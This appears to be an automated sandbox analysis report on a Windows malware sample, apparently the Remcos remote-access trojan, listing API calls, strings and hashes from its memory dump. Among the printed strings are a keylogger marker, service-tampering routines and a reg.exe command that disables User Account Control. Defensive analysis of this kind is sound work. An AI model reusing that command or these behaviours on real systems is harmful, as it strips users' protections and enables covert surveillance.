                                                                                                                                                • Instruction Fuzzy Hash: F761A270700611ABCB209F66C981BAA7BA5AF44704F14411AFF05877A2D77CE8C2CBD9
                                                                                                                                                Function 0044597A Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: __cftoe
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4189289331-0
                                                                                                                                                • Opcode ID: 30f97a14dd6f87c9245b8e0b778041a74f07a421c1ac77e9beff42b74887127b
                                                                                                                                                • Instruction ID: b93b8478136607885b926496a305f1bfb884a7f6acf724e610c81469f19cb9e5
                                                                                                                                                • Opcode Fuzzy Hash: 30f97a14dd6f87c9245b8e0b778041a74f07a421c1ac77e9beff42b74887127b
                                                                                                                                                • Instruction Fuzzy Hash: 2551FD72500605ABFF209B598C81EAF77A8EF45334F25421FF915A6293DB3DD900C66D
                                                                                                                                                Function 0041AD09 Relevance: 9.1, APIs: 6, Instructions: 67serviceCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD19
                                                                                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A41F,00000000), ref: 0041AD2D
                                                                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD3A
                                                                                                                                                • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD6F
                                                                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD81
                                                                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD84
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 493672254-0
                                                                                                                                                • Opcode ID: f3d4b447748c037b2dac55463b57a149c398f0d820f611c96b244fdc7ed94624
                                                                                                                                                • Instruction ID: 77e668261cf9ee2bd18e5a0e87596c089765e66a1be6d3c981f75cbf7ed2a716
                                                                                                                                                • Opcode Fuzzy Hash: f3d4b447748c037b2dac55463b57a149c398f0d820f611c96b244fdc7ed94624
                                                                                                                                                • Instruction Fuzzy Hash: A7016D311462157AD6111B34AC4EFFB3B6CDB02772F10032BF625965D1DA68CE8195AB
                                                                                                                                                Function 0044A084 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 305COMMONLIBRARYCODE
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: __alldvrm$_strrchr
                                                                                                                                                • String ID: PkGNG
                                                                                                                                                • API String ID: 1036877536-263838557
                                                                                                                                                • Opcode ID: 8f78adc186be73fa66820e99e070c83f6be0ee509df7c4dfd67e0dde8c439993
                                                                                                                                                • Instruction ID: 8ce1af842cd152cb2b2428f5d584a25f6c9224aafe101b92c03b71ca88d34985
                                                                                                                                                • Opcode Fuzzy Hash: 8f78adc186be73fa66820e99e070c83f6be0ee509df7c4dfd67e0dde8c439993
                                                                                                                                                • Instruction Fuzzy Hash: 87A156729846829FF721CF58C8817AEBBA5FF15314F2841AFE8859B381D27C8C51C75A
                                                                                                                                                Function 00448295 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                                                                                                                                • _free.LIBCMT ref: 004482CC
                                                                                                                                                • _free.LIBCMT ref: 004482F4
                                                                                                                                                • SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448301
                                                                                                                                                • SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                                                                                                                                • _abort.LIBCMT ref: 00448313
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ErrorLast$_free$_abort
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3160817290-0
                                                                                                                                                • Opcode ID: 0dc6b6a3e4ae5b17dec3dccad88ee1f92140bcc2d5108ccd544116d6be2417e2
                                                                                                                                                • Instruction ID: 8d34d3ffa9a8a5ca7629c839d325bdddc3ef58a145117f7ac1d0225592351e3a
                                                                                                                                                • Opcode Fuzzy Hash: 0dc6b6a3e4ae5b17dec3dccad88ee1f92140bcc2d5108ccd544116d6be2417e2
                                                                                                                                                • Instruction Fuzzy Hash: 8EF0A435101B006BF611772A6C06B6F26599BD3B69F36042FFD18962D2EF6DCC42816D
                                                                                                                                                Function 0041AB37 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB46
                                                                                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB5A
                                                                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB67
                                                                                                                                                • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB76
                                                                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB88
                                                                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB8B
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 221034970-0
                                                                                                                                                • Opcode ID: bc8933c3fd8e2fa998b2246ab8c72ed9b0f5170f60f0245b371609b51ac54b8f
                                                                                                                                                • Instruction ID: 443f58cffa4f299642b313368f914f767bd977a6fac550f0ec2f38f013616b5a
                                                                                                                                                • Opcode Fuzzy Hash: bc8933c3fd8e2fa998b2246ab8c72ed9b0f5170f60f0245b371609b51ac54b8f
                                                                                                                                                • Instruction Fuzzy Hash: E4F0F631541318BBD7116F259C49DFF3B6CDB45B62F000026FE0992192EB68DD4595F9
                                                                                                                                                Function 0041AC3B Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC4A
                                                                                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC5E
                                                                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC6B
                                                                                                                                                • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC7A
                                                                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8C
                                                                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8F
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 221034970-0
                                                                                                                                                • Opcode ID: 94d93926ec858c5890fc603d54741d931e0eaafa3f6b468ff921a10e10d86c77
                                                                                                                                                • Instruction ID: 80b71cf000cc834045a6d48b23744411b71cc7e49355023a2f572df053a73ec4
                                                                                                                                                • Opcode Fuzzy Hash: 94d93926ec858c5890fc603d54741d931e0eaafa3f6b468ff921a10e10d86c77
                                                                                                                                                • Instruction Fuzzy Hash: 73F0C231501218ABD611AF65AC4AEFF3B6CDB45B62F00002AFE0992192EB38CD4595E9
                                                                                                                                                Function 0041ACA2 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACB1
                                                                                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACC5
                                                                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACD2
                                                                                                                                                • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACE1
                                                                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF3
                                                                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF6
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 221034970-0
                                                                                                                                                • Opcode ID: 4f42f77feb4e09d2984437374767d6fba58dab4553ac710dbf5187c031f369c2
                                                                                                                                                • Instruction ID: 4c72e2560426042a93d841201029be6eaa37955ba2c7d49e75f16ae618c5df44
                                                                                                                                                • Opcode Fuzzy Hash: 4f42f77feb4e09d2984437374767d6fba58dab4553ac710dbf5187c031f369c2
                                                                                                                                                • Instruction Fuzzy Hash: 85F0F631501228BBD7116F25AC49DFF3B6CDB45B62F00002AFE0992192EB38CD46A6F9
                                                                                                                                                Function 00456C9A Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 152COMMONLIBRARYCODE
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _free
                                                                                                                                                • String ID: @^E
                                                                                                                                                • API String ID: 269201875-2908066071
                                                                                                                                                • Opcode ID: 5a84445a6d60efe319971740dde2d2f541f568e0726df331b0a843d8179482b0
                                                                                                                                                • Instruction ID: 6f8591e81a910498abf0b0e408487d1c0faf04506bf4bd3dd9e850377c22d226
                                                                                                                                                • Opcode Fuzzy Hash: 5a84445a6d60efe319971740dde2d2f541f568e0726df331b0a843d8179482b0
                                                                                                                                                • Instruction Fuzzy Hash: 34413931B00104AAEB207B7A9C4666F3AB5DF45735F570A1FFD28C7293DA7C481D426A
                                                                                                                                                Function 00442851 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: PkGNG
                                                                                                                                                • API String ID: 0-263838557
                                                                                                                                                • Opcode ID: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                                                                                                                                • Instruction ID: b0a34e1ed6630e1fb57c9e62860a3601010315cd62f19612bff23542d182db60
                                                                                                                                                • Opcode Fuzzy Hash: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                                                                                                                                • Instruction Fuzzy Hash: 70412AB1600704BFE724AF79CD41B5EBBE8EB88714F10462FF145DB281E3B999058798
                                                                                                                                                Function 00404CC3 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121synchronizationthreadCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404DD2
                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00404DDB
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                                                                                • String ID: PkGNG
                                                                                                                                                • API String ID: 3360349984-263838557
                                                                                                                                                • Opcode ID: 77a6d032992f3495e2e52a01d2ead9a1ebcb79a8041a0f526cc04fc7fe31482d
                                                                                                                                                • Instruction ID: 30d48123e17294c38ae6f490953f1b42a5ca81467cb0df1087f173bd09261e59
                                                                                                                                                • Opcode Fuzzy Hash: 77a6d032992f3495e2e52a01d2ead9a1ebcb79a8041a0f526cc04fc7fe31482d
                                                                                                                                                • Instruction Fuzzy Hash: 684182B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                                                                                                                                                Function 0040B19F Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68timeCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B1AD
                                                                                                                                                • wsprintfW.USER32 ref: 0040B22E
                                                                                                                                                  • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,00000000,0040B245,00000000), ref: 0040A69D
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: EventLocalTimewsprintf
                                                                                                                                                • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                                                                                                                                • API String ID: 1497725170-248792730
                                                                                                                                                • Opcode ID: b92970106d7d5ed65003fb4f3b7a0e91fd1e2f7406e6a9ff2526561c329a63fb
                                                                                                                                                • Instruction ID: 4bcbbea8953a56f0834a7592719eb704c83d71ae81c48fe005db4fd1b538d991
                                                                                                                                                • Opcode Fuzzy Hash: b92970106d7d5ed65003fb4f3b7a0e91fd1e2f7406e6a9ff2526561c329a63fb
                                                                                                                                                • Instruction Fuzzy Hash: 88114272404118AACB19AB96EC55CFE77BCEE48315B00012FF506A61D1FF7C5A45C6AD
                                                                                                                                                Function 0040A6B0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58sleepfileCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A788), ref: 0040A6E6
                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                                                                                                                                • Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,0040A788), ref: 0040A729
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$CloseCreateHandleSizeSleep
                                                                                                                                                • String ID: XQG
                                                                                                                                                • API String ID: 1958988193-3606453820
                                                                                                                                                • Opcode ID: 09b71735cca9286fb237afdc81f34cc8b89fa37515d8f2a58262fc809d9c95cd
                                                                                                                                                • Instruction ID: fa029248b1ac628aedb802b18ed81a98d1a4018e107c0b234daa3009ae89debe
                                                                                                                                                • Opcode Fuzzy Hash: 09b71735cca9286fb237afdc81f34cc8b89fa37515d8f2a58262fc809d9c95cd
                                                                                                                                                • Instruction Fuzzy Hash: 96110130600740AADA31A734988961F7BA9DB45356F44483EF1866B6D3C67DDC64C71F
                                                                                                                                                Function 0041D5A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57registryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • RegisterClassExA.USER32(00000030), ref: 0041D5EC
                                                                                                                                                • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D607
                                                                                                                                                • GetLastError.KERNEL32 ref: 0041D611
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ClassCreateErrorLastRegisterWindow
                                                                                                                                                • String ID: 0$MsgWindowClass
                                                                                                                                                • API String ID: 2877667751-2410386613
                                                                                                                                                • Opcode ID: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                                                                                                                                • Instruction ID: e808ecd18ef19f47bd472c0c6462b34ef8490c58390ad3ae495a6aa035ed2a4b
                                                                                                                                                • Opcode Fuzzy Hash: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                                                                                                                                • Instruction Fuzzy Hash: 1F0125B1D00219ABDB00DFA5EC849EFBBBCEA08355F40453AF914A6241EB7589058AA4
                                                                                                                                                Function 00407790 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43processCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 004077D6
                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 004077E5
                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 004077EA
                                                                                                                                                Strings
                                                                                                                                                • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004077CC
                                                                                                                                                • C:\Windows\System32\cmd.exe, xrefs: 004077D1
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseHandle$CreateProcess
                                                                                                                                                • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                                                                                                                • API String ID: 2922976086-4183131282
                                                                                                                                                • Opcode ID: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                                                                                                                                • Instruction ID: 1887ccd63cb29ce90d3c4a9dee080bc6fb52b3336ad705aa4023eed0db3a7680
                                                                                                                                                • Opcode Fuzzy Hash: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                                                                                                                                • Instruction Fuzzy Hash: 04F09672D4029C76CB20ABD7AC0EEDF7F3CEBC5B11F00051AF904A2045DA745400CAB5
                                                                                                                                                Function 0040729B Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: SG$C:\Users\user\Desktop\LdSbZG1iH6.exe
                                                                                                                                                • API String ID: 0-4074075201
                                                                                                                                                • Opcode ID: 534232ae4986bc0cd44d5d9dbb6e579f37bf6e7b645008295a27304146529b35
                                                                                                                                                • Instruction ID: 5ffff352cfcc2e87221e4fa572a01d73507d198e899e6baa5594ec663d9dd15d
                                                                                                                                                • Opcode Fuzzy Hash: 534232ae4986bc0cd44d5d9dbb6e579f37bf6e7b645008295a27304146529b35
                                                                                                                                                • Instruction Fuzzy Hash: 8DF02BB0E04600EBCB1477345D296AA3656A780397F40487BF507EB2F2EBBD5C41871E
                                                                                                                                                Function 004050E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EF8), ref: 00405120
                                                                                                                                                • SetEvent.KERNEL32(?), ref: 0040512C
                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00405137
                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00405140
                                                                                                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                                                                                                • String ID: KeepAlive | Disabled
                                                                                                                                                • API String ID: 2993684571-305739064
                                                                                                                                                • Opcode ID: 260c2b08e01b5d66b359e99273a0c89895ec309b6af50f33d4504d26b953d9d7
                                                                                                                                                • Instruction ID: dc79248355977efa3495ea8e96f68553e1f2867eb32bbe7dc6984d352a193ca4
                                                                                                                                                • Opcode Fuzzy Hash: 260c2b08e01b5d66b359e99273a0c89895ec309b6af50f33d4504d26b953d9d7
                                                                                                                                                • Instruction Fuzzy Hash: 5DF06D71904711BBDB203B758D0AAAB7E95AB06315F0009BEF982916E2D6798C408F9A
                                                                                                                                                Function 0041AE51 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30sleepCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                                • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041AE83
                                                                                                                                                • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE91
                                                                                                                                                • Sleep.KERNEL32(00002710), ref: 0041AE98
                                                                                                                                                • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AEA1
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: PlaySound$HandleLocalModuleSleepTime
                                                                                                                                                • String ID: Alarm triggered
                                                                                                                                                • API String ID: 614609389-2816303416
                                                                                                                                                • Opcode ID: fc1dfc3d80636db02bd80d67f349f84282c1adb2487fd06cf6dad27e320cdf65
                                                                                                                                                • Instruction ID: 264e31dd7f8ae4a58c3cd97330858728e5483d82e525179ed11d996d756d41c5
                                                                                                                                                • Opcode Fuzzy Hash: fc1dfc3d80636db02bd80d67f349f84282c1adb2487fd06cf6dad27e320cdf65
                                                                                                                                                • Instruction Fuzzy Hash: 3EE0D826A40220779A10337B6D0FD6F3D29CAC3B2570100BFFA05660C2DD540C01C6FB
                                                                                                                                                Function 0041CDE9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CE7E), ref: 0041CDF3
                                                                                                                                                • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041CE7E), ref: 0041CE00
                                                                                                                                                • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041CE7E), ref: 0041CE0D
                                                                                                                                                • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041CE7E), ref: 0041CE20
                                                                                                                                                Strings
                                                                                                                                                • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CE13
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                                                                                                                • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                                                                                                                • API String ID: 3024135584-2418719853
